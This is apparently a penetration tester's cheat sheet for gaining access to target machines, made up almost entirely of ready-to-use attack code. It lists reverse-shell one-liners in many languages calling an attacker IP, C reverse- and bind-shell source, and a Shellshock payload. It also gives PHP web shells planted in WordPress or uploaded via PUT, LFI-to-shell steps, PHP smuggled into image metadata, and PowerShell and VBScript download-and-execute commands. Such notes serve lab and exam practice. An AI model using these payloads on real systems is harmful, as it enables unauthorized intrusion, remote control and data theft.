Gaining access
Shell it?

Shells

Reverse shells

Bash

Bash and TCP sockets
bash -i >& /dev/tcp/x.x.x.x/6969 0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1
sh and TCP sockets
/bin/sh -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",6969));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="x.x.x.x";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:6969");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("x.x.x.x",6969);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",6969).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh x.x.x.x 6969
nc -e cmd.exe x.x.x.x 6969
/bin/sh | nc x.x.x.x 6969
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 6969 0/tmp/p

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 6969 0/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/6969;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Shellshock reverse shell

Verify the vulnerability via the HTTP User-Agent header:
() { :; }; /bin/bash -c 'whoami'
Spawn a reverse shell:
() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/6969 0>&1;'

PowerShell

Invoke-PowerShellTcp

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Add to the bottom of the script:
Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 6969
Then start a web server on Kali, set up an nc listener on port 6969, and download the script on the target:
# from cmd
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')
# PowerShell
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

C

// gcc reverse.c -o reverse
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int main (int argc, char **argv)
{
int scktd;
struct sockaddr_in client;
client.sin_family = AF_INET;
client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
client.sin_port = htons(6969); // attacker port
scktd = socket(AF_INET,SOCK_STREAM,0);
connect(scktd,(struct sockaddr *)&client,sizeof(client));
dup2(scktd,0); // STDIN
dup2(scktd,1); // STDOUT
dup2(scktd,2); // STDERR
execl("/bin/sh","sh","-i",NULL,NULL);
return 0;
}

Bind shells

C

// gcc bind.c -o bind
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int main (int argc, char **argv)
{
int scktd = -1;
int scktd_client = -1;
int i = -1;
struct sockaddr_in server;
struct sockaddr_in client;
scktd = socket(AF_INET,SOCK_STREAM,0);
if (scktd == -1)
return -1;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(6969); // local listening port
if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
return -2;
listen(scktd,3);
i = sizeof(struct sockaddr_in);
scktd_client = accept(scktd,(struct sockaddr *)&client,(socklen_t*)&i);
if (scktd_client < 0)
return -3;
dup2(scktd_client,0); // STDIN
dup2(scktd_client,1); // STDOUT
dup2(scktd_client,2); // STDERR
execl("/bin/sh","sh","-i",NULL,NULL);
return 0;
}

Web shells

PHP

Add to the WordPress theme's 404 page, then request http://x.x.x.x/404.php?cmd=id
Or spawn a reverse shell: http://x.x.x.x/404.php?cmd=nc x.x.x.x 6969 -e /bin/sh
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>

phpMyAdmin

<?php system("/usr/local/bin/wget http://x.x.x.x:6969/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>

Run SQL query

SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"

From LFI to reverse shell

First verify the LFI. Example with a null byte:
http://x.x.x.x/blah?parameter=/etc/passwd%00
Using HackBar (Firefox extension).
POST request URL:
http://x.x.x.x/blah?parameter=php://input%00
POST data:
<? phpinfo(); ?>
POST data for a reverse shell on port 443:
<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>

HTTP methods

Check whether you can upload a shell via an upload form.

HTTP POST

Where "x.x.x.x" is the target IP:
curl -X POST -F "[email protected]/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"

HTTP PUT

Where "x.x.x.x" is the attacker's IP:
curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php

Inject PHP -> JPEG

exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' hodor.jpeg
exiftool "-comment<=shell.php" hodor.png

Local

C for SUID

Spawns a Linux shell:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}

File transfers

First start our file server:
Python webserver (default port 8000)
python -m SimpleHTTPServer
Python webserver at port 8001
python -m SimpleHTTPServer 8001
Python webserver with upload form
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py

Windows

PowerShell

Any version
(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:6969/file", "C:\Users\hodor\file")
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')

Download via RCE

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1

FTP

Option 1

Configure FTP on Kali:
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Start the FTP server on Kali:
# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start
Download nc.exe on the target:
echo open x.x.x.x 21> test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt

Option 2

Configure FTP on Kali:
apt-get install python-pyftpdlib
Start the FTP server on Kali:
python -m pyftpdlib -p 21
Download files (in this example on a Windows target):
ftp x.x.x.x
get nc.exe

Launch reverse shell

nc.exe -nv x.x.x.x 6969 -e cmd.exe
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 6969

Share local folder with RDP

rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare

VBScript

Below is a VBScript alternative to Linux wget:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Then execute the above script:
cscript wget.vbs http://x.x.x.x/file.exe file.exe

Linux

Wget

wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt

Netcat

From attacker -> target
At the target:
nc -lvp 6969 > blah.txt
At the attacker (method 1):
nc x.x.x.x 6969 < blah.txt
At the attacker (method 2):
cat blah.txt | nc x.x.x.x 6969

Python

python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py